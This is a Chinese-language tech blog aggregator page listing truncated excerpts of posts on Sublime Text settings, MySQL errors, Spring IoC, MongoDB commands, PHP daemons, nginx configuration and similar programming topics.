    Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项:no_bold不显示粗体字,no_italic不显示斜体字,no_antialias和
  • MySQL server has gone away 问题的解决方法 dcj3sjt126com SQL Server
    MySQL server has gone away 问题解决方法,需要的朋友可以参考下。 应用程序(比如PHP)长时间的执行批量的MYSQL语句。执行一个SQL,但SQL语句过大或者语句中含有BLOB或者longblob字段。比如,图片数据的处理。都容易引起MySQL server has gone away。 今天遇到类似的情景,MySQL只是冷冷的说:MySQL server h
  • javascript/dom:固定居中效果 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&
  • 使用 Spring 2.5 注释驱动的 IoC 功能 e200702084 springbean配置管理IOCOffice
    使用 Spring 2.5 注释驱动的 IoC 功能 developerWorks 文档选项 将打印机的版面设置成横向打印模式 打印本页 将此页作为电子邮件发送 将此页作为电子邮件发送 级别: 初级 陈 雄华 ([email protected]), 技术总监, 宝宝淘网络科技有限公司 2008 年 2 月 28 日  &nb
  • MongoDB常用操作命令 geeksun mongodb
    1.   基本操作 db.AddUser(username,password)               添加用户 db.auth(usrename,password)      设置数据库连接验证 db.cloneDataBase(fromhost)    
  • php写守护进程(Daemon) hongtoushizi PHP
    转载自: http://blog.csdn.net/tengzhaorong/article/details/9764655   守护进程(Daemon)是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。   1、基本概念   &nbs
  • spring整合mybatis,关于注入Dao对象出错问题 jonsvien DAOspringbeanmybatisprototype
    今天在公司测试功能时发现一问题: 先进行代码说明: 1,controller配置了Scope="prototype"(表明每一次请求都是原子型)    @resource/@autowired service对象都可以(两种注解都可以)。 2,service 配置了Scope="prototype"(表明每一次请求都是原子型)
  • 对象关系行为模式之标识映射 home198979 PHP架构企业应用对象关系标识映射
    HELLO!架构   一、概念 identity Map:通过在映射中保存每个已经加载的对象,确保每个对象只加载一次,当要访问对象的时候,通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射,Mapper类的getFromMap方法就是实现标识映射的实现。     二、为什么要使用标识映射? 在数据源架构模式之数据映射器中 //c
  • Linux下hosts文件详解 pda158 linux
     1、主机名:   无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。   公网:IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。   局域网:每台机器都有一个主机名,用于主机与主机之间的便于区分,就可以为每台机器设置主机
  • nginx配置文件粗解 spjich javanginx
    #运行用户#user  nobody;#启动进程,通常设置成和cpu的数量相等worker_processes  2;#全局错误日志及PID文件#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  inf
  • 数学函数 w54653520 java
    public  class  S {        // 传入两个整数,进行比较,返回两个数中的最大值的方法。      public  int  get( int  num1, int  nu
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他